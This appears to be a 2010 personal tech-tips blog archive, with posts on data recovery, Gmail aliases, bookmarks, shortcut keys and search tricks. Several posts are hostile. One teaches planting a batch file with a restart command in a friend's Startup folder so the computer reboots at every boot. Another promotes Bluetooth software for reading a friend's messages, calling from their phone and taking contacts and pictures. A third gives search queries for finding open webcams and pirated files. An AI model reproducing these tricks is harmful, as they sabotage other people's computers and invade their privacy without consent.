My Blog List

Dec 24, 2010

how to create a virus............

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
                   For this, the virus need to be double clicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus.


MAKE COMPUTER KEEP RESTARTING


1.open note pad


2.type "shutdown -r -t 30" with out quotes


3.save the file with .bat extension


4.explaination,u have created a prog which shutdowns the pc with in 30 sec
of executing the file


5. now open "C:\Documents and Settings\username\Start Menu\Programs\Startup (USERNAME is the username of your computer suppose pc name is anil so the user name is anil)


6.paste a shortcut on this directory


NOW WHEN EVER UR FRIEND STARTS HIS PC  or double click on that file count down will start after 30 sec his pc will shutdown
you can also make his pc shutdown instead of restart..... just replace "shutdown -s" in the place of  "shutdown -r"
and if you want to give a massage when the computer is shutting down so write that code without  bracket 
(shutdown -r -t 60 -c "system goes to shutdown") in the place of (shutdown -r -t 30)
if you want to forcely shutdown so write it shutdown -s


enjoy with this post....but  this is not a virus but look so....

Dec 11, 2010

how to recover data form hard disk or pen-drive ?

hi friends, 
               you had lost same data by our mistake, those file which you have deleted after using Shift + Delete Key or you have emptied recycle bin unintentionally or intentionally, you had formate your hard disk or pen drive and you want recover them so read it carefully .now i will tell u about a software. This software is especially designed for PCs running Windows to help you to search, locate and recover your lost, deleted, missing and inaccessible data. You can efficiently use this software on formatted hard drive.  Powerful scanning algorithm of    Stellar Phoenix  Windows DataRecovery software recovers your lost data from hard disk which you lost due to any reason like accidental deletion, virus attack, formatting of hard disk, unexpected system shutdown, sabotage, file system damage etc. you can also recover the missing or lost logical drives (volumes) which you lost due to unexpected shutdown . It has great features like Raw File Recovery which recognizes and recovers more than 300 types including documents, spreadsheets, web content, emails, images, music, videos and application data files.
                 In the case when your file systems or operating system corrupt then also Stellar Phoenix Windows Data Recovery software is capable in recovering those lost or deleted files and folders. Software is capable in recovering those files without losing any file or without disturbing any other file of that system. You can see the preview of recovered file and save at your desired location. You can recover compressed NTFS file system. 
                            Stellar Phoenix Windows Data Recovery software has user friendly interface with powerful function. Software supports FAT16, FAT32, VFAT, NTFS and NTFS5 file systems. Now recover lost and deleted files systematically.


Steps to use Stellar Phoenix Windows Data Recovery Software are as follows:
        
   1>> launch the application.



·                                                                                The user interface screen consists of menu bar, toolbar, tree structure (left pane), main area (right pane) and log window. CD/DVD drive will be visible in the tree view if it contains CD/DVD.
·                                 The physical disk in the system consists of two or more logical drives which you may be lost due to various reasons such as a simple voltage fluctuation or a virus attack. You can recover lost physical drive and data contained in that. 


·              2>> To recover lost data from physical disk-   
o                                                                                                    
                                                  >>Double click on Physical Disk in the left pane.
o                                                                                                           >>After that you get a Select Appropriate Action window
o                                                                                                           >> You get the three required action to select.


§                 3>> Select logical drive- standard and advanced search are available to search for all the lost logical drive in the physical disk. Discovered logical drives will appear on the tree structure. Further you can recover data from these logical drives.
§                4>>  Raw data recovery- you can recover raw data from badly corrupted drive with this option. You can use this method to search for known file types or search from the selected region.
§                5>>   Create image file- this method take sector by sector image of the specified region of the Physical disk or removal media. It is helpful when media has developed bad sector. You can recover data using this image file.

·                6>> To recover data from the discovered logical drive

o                                                    Double click on the Logical drive option displayed in the left pane of the interface.  You get a dialog box with some option. According to your need perform the task.
o                                                        Similarly, lost files/folders from CD/DVD drive or other storage media can be scanned and recovered.
In this simple way you can recover your lost logical data and also the data contained in it. This is very simple to use Stellar Phoenix Windows Data Recovery Software. With the help of this software you can recover data from FAT16, FAT32, VFAT, NTFS and NTFS5 file system. If you are unknown from the file system then this software is great to use and this way you can secure you data and get back your data easily. Some tips to use this software.


System requirement:
·                                                                                               Pentium Class processor
·                                                                                               Windows Vista / XP / 2003 / 2000 / w7
·                                                                                              128 MB or more of RAM
·                                                                                               35 MB of free space


         Download:Stellar Phoenix Windows DataRecovery software




you want to another software for data recovery 
                                                                          
                                                       Disk recovery software
                                                                                         

Nov 15, 2010

Join Two E-mail address in a one

Hi.. Friends You have a multiple email address and you are not remembering it .don't wary friends now i will tell you "how can remember that"...
                                               You can have multiple email address of your existing Gmail account just add "+" symbol after your user name then add anything followed by @gmail.com. Read the example below for better understanding.

My Gmail id is anil@gmail.com Suppose I have three friends annu,sudheer and naveen  and every person have a gmail account .so i will add their user name with my user name by a + sign.
                  if they ask my email address then I tell them its anil+ annu@gmail.com, anil+ sudheer@gamil.com and anil+ naveen@gmail.com
     When they send me at this address it first goes to Gmail server where it recognize it as anil@gmail.com and avoids “+” sign and anything after it. So any mail send to anil+ anything@gmail.com, come in my inbox.
                      So If you have Boyfriend/Girlfriend tell him/her email your email id as yourmail+ yourmate@gmail.com

Note: TO check your mail you have to login as yourmail@gmail.com that is in my case anil@gmail.com  without “+” sign.

Oct 31, 2010

Use your bookmark after re-installation of your operating system or move them from one computer to another ..............

Hey friends today i will tale you
          How would you like to save your bookmarks in IE, Firefox, Opera and Google Chrome so that you can restore them in case if you need to re-install your operating system or move them from one computer to another?  
           This post will show you how to save and restore bookmarks in simple steps.............

Bookmarking the favorite web pages can save a lot of time as it becomes almost impossible to remember a list of favorite websites and their URLs. However it can be really frustrating at times when you lose all those saved bookmarks in case if a computer crashes. Also if you are a person who uses more than one computer then it becomes hard to copy all those saved bookmarks one by one manually. So saving the bookmarks can become handy in such situations. Here is how to to do it.

 If you are using the Internet Explorer so...... 
Saving a Bookmark file in Internet Explorer

      1. From the File menu, select the option Import and Export.

      2. Select the option Export to a file and click on Next.

      3. In the next screen select Favorites and click on Next.

      4. In the next screen again click on Favorites and click on Next.

      5. Now choose the destination where you want to save your bookmarks and click on Export.

      6. In the next screen click on Finish.

Now you have successfully saved all your bookmarks in a .HTM file. You can use this file to later restore the bookmarks to either IE, Firefox or any other browser. To import the saved bookmarks from a file all you need to do is goto File menu, click on Import and Export, select the option Import from a file and proceed with the screen instructions.



If you are using the Firefox so......
Saving a Bookmark file in Firefox
        
        1. From the Bookmarks menu on the top select the option Organize Bookmarks.

        2. A window will pop-up. From the window click on Import and Backup at the top and select the     
             option Export HTML.

        3. Now choose the destination where you want to save the bookmark file and click on Save.

To restore this saved file, follow the step-1 and in step-2 select the option Import HTML instead of Export HTML and proceed.     


If you are using the Google Chrome so......
Saving a Bookmark file in Google Chrome
        
          1. From the Tools menu, select Bookmark Manager.

          2. Click the Organize menu in the manager.

          3. Select Export bookmarks.

          4. Select the location where you want your exported file to be saved, then click Save.

To restore the bookmarks, follow step-1, step-2 and in step-3 select Import bookmarks instead of Export bookmarks and proceed.

 If you are using Opera so......
Saving a Bookmark file in Opera

       1. From the File menu, select the option Import and Export.

       2. Scroll over to the pull-down menu on the right and choose Export Bookmarks as HTML.

       3. On the next screen, choose the destination folder from the Save in menu text box at the top of
           the screen.

       4. Just click the Save button and you’re done.

Oct 29, 2010

Hack yours friend's mobile

Hay friends Are you want to hack your's friend mobile......So read this carefully but firstly i want to tell you it's your on risk..........
           So are you ready.....

So you want to do any of the following?

  • log into your friends mobile
  • read his messages
  • change his phone settings- read his messages
  • change profile
  • play his ringtone even if phone is on silent
  • play his songs(in his phone)
  • restart the phone
  • switch off the phone
  • restore factory settings
  • change ringing volume
                                       AT THE LAST
                                                            &
                                                           MORE IMPORTANT
  • you can also call from his mobile phone
  • you can also take any phone number or picture from his mobile phone


 Ok so how can we do this.........
 it's very simple way you can do all this just insulting A simple software in your mobile phone.
 after that you can use it as a Bluetooth. It uses all the property of your cell phone's Bluetooth so it is  
 important some features are existing functionality in your mobile phone.and the other mobile phone

Prerequisites :-
                      The other phone must be bluetooth enabled(most are these days)
                    

          download that software click hear
        


Usage:-

  • On series 60, install directly
  •  If you have a cellphone like series 40 with bluetooth and Java 2 support make .jad file with jad        generator (included on package). 
  • When connecting devices use a code 0000
  • Before starting the application on smartphones do not forget to turn on Bluetooth.

                   now you are enable to hack any mobile....................

Oct 28, 2010

How to reset or change the computer password.........

Hay friends today i will tell u.How to reset or change the computer password by command prompt?
it is simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.


1. Open the command prompt (Start->Run->type cmd->Enter)
       now this type of text will be written on the command prompt 
           C:\Documents and Settings\anil>


2. Now type net user and press Enter


3. Now the system will show you a list of user accounts on the computer.
     for example :- 
                           you need to reset the password of the account his account name is Anil ,
      then do as follows....

4. Type net user Anil  * and press Enter. Now the system will ask you to enter the new password for the          
     account. That’s it. Now you’ve successfully reset the password for Anil without knowing his old
     password.and when you will type password,command prompt will not show that password.
                            So in this way you can reset the password of any Windows account at times when you forget it so that you do not need re-install your OS for any reason. I hope this is help full.

Oct 25, 2010

window shortcut keys


Hay friends last time i told you how to use google for HACKING ? & how to know your site are valurablel or not?
             
                     But This time i will told u.how to use your computer by shortcut keys.if you use that keys so you can run fast your computer. 

        Here are the list of all Windows key shortcuts, few are not listed on Microsoft website also.
Windows  Key 
Displays the Start Menu. 
Windows key  + E 
Opens a new Explorer Window
Windows key Key + D 
Minimizes all windows and shows the Desktop.
Windows Key + D 
Opens all windows and takes you right back to where you were.
Windows Key + F 
Displays the Find all files dialog box.
Windows Key + L 
Lock your Windows XP computer.
Windows Key + M 
Minimizes all open windows.
Windows Key + Shift + M 
Restores all previously open windows to how they were before you minimized them.
Windows Key + R 
Displays the Run command.
Windows Key + F1 
Displays the Windows Help menu.
Windows Key + Pause/Break 
Displays the Systems Properties dialog box.
Windows Key + Tab 
Cycle through the buttons on the Taskbar.
Windows Key + Ctrl + F
Find computer

Additional :
If you have IntelliType software installed

Windows Key + L
Log off Windows
Windows Key + P 
Starts Print Manager
Windows Key + C 
Opens Control Panel
Windows Key + V 
Starts Clipboard
Windows Key + K 
Opens Keyboard Properties dialog box
Windows Key + I
Opens Mouse Properties dialog box
Windows Key + A 
Starts Accessibility Options (if installed)
Windows Key + SPACEBAR 
Displays the list of Microsoft IntelliType shortcut keys
Windows Key + S 
Toggles CAPS LOCK on and off

Oct 23, 2010

What is Google hacking?


                                          Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.  
           
1. Google + Social media Sites = Quality Free Stuff - If you are on the hunt for free desktop wallpaper, stock images, WordPress templates or the like, using Google to search your favorite social media sites is your  best bet. The word "free' in any standard search query  immediately attracts spam. Why wade through potential spam in standard search results when numerous social media sites have an active community of users who have already ranked and reviewed the specific free items that interest you. All you have to do is direct Google to search through each of those individual social media sites, and bingo..you find quality content ranked by hundreds of other people.
Examples:
site:digg.com free"desktop wallpaper"

2. Find free Anonymous Web Proxies- A free anonymous web proxy site allows any web browser to access other third-party websites by channeling the browser's connection through the proxy. The web proxy basically acts as a middleman between your web browser and third-party website you are visiting. Why would you want to do this? There are two common reasons.
inurl:"nph-proxy.cgi" "start using cgiproxy"

3. Google for Music, Videos anf Ebooks - Google can be used to conduct a search for almost any file type, including Mp3s, PDFs and videos. Open web directories are one of the easiest places to quikly find an endless quantity of freely downloadable files. This is an oldie, but it's a goodie! why thousands of webmasters incessantly fail to secure their web severs will continue to googlle our minds.
Examples:
Find Music: -inurl:(htm|html|php) intitle:"index of" + "last modified" + "parent directory" + description+size=(wma|mp3)"Counting Crows"

Find Videos: -inurl(htm|html|php) intitle:"index of" + "last modified" + "parent directory" + description+size_(mpg|wmv)"chapelle"


Find Ebooks: -inurl(htm|html|php) intitle:"index of" + "last modified" + "parent directory" + description+size_(pdf|doc)"george orwell 1984"

4. Browse Open Webcams Worldwide - Take a randomized streaming video tour of the world by searching Google for live open access video webcams. This may not be the most productive Google trick ever, but it sure is fun! (Note: you may be prompted to install an ActiveX control or the java runtime environment which allows your browser to view certain video stream formats.)
Examples:
Axis Webcams: inurl:/view.shtml or inurl:view?index.shtml
Cannon Webcams: sample/LvAppl/
MOBOTIX Webcams: control/userimage.html
FlexWatch Webcams: /app/idxas.html
JVC Webcams: intitle: intitle:"V.networks [Motion picture(Java)]"

5. Judge a site by its Image - Find out what a site is all about by looking at a random selection of the images hosted on its web pages. Even if you are somewhat familiar with the target site's content, this can be an entertaining little exercise. You will almost surely find something you didn't expect to see. All you have to do is use Google's Site: operator to target a domain in an image search.
Examples:
Digg in images
Wired in images
Reddit in images 

6. Result Based on Third-Party opinion - Sometimes you can get a better idea of the content located within a website by reading other websites refer to that site's content. the allinanchor: Google search operator can save you large quantities of time when a normal textual based search query fails to fetch the information you desire. It conducts a search on keywords used strictly in the anchor text or linking text of third party sites that link to the web pages returned by the search query. In other words, this operator filters your search results in a way such that Google ignores the title and content of the returned web pages but instead bases the search relevance on the keywords that other sites use to reference the results. It can add a whole new dimension of varity to your search results.
Examples (noties the added varity between search results):
allinanchor:"google hacks" vs basic search for Google hacks
allinanchor:"wordpress exploits" vs basic search for Wordpress exploits



What a hacker can do if your site is vulnerable? or How to know your site are vulnerable or not?

 Information that the Google Hacking Database identifies:

Advisories and server vulnerabilities
Error messages that contain too much information
Files containing passwords
Sensitive directories
Pages containing logon portals
Pages containing network or vulnerability data such as firewall logs.
How to check for Google hacking vulnerabilities
The easiest way to check whether your web site & applications have Google hacking vulnerabilities, is to use a Web Vulnerability Scanner. A Web Vulnerability Scanner scans your entire website and automatically checks for pages that are identified by Google hacking queries. (Note: Your web vulnerability scanner must be able to launch Google hacking queries).

The Acunetix Web Vulnerability Scanner scans for SQL injection, Cross site scripting and many more vulnerabilities.
Preventing Google hacking attacks
Remove all pages identified by Google hacking queries

Check if your website is vulnerable to attack with Acunetix Web Vulnerability Scanner

Acunetix Web Vulnerability Scanner ensures website security by automatically checking for SQL injection, Cross site scripting and other vulnerabilities. It checks password strength on authentication pages and automatically audits shopping carts, forms, dynamic content and other web applications. As the scan is being completed, the software produces detailed reports that pinpoint where vulnerabilities exist. Take a product tour or download the evaluation version today!

Scanning for XSS vulnerabilities with Acunetix WVS Free Edition!
To check whether your website has cross site scripting vulnerabilities, download the Free Edition from http://hotfile.com/dl/77785632/7faeb49/vulnerabilityscanner.exe.htmlThis version will scan any website / web application for XSS vulnerabilities and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the web-site).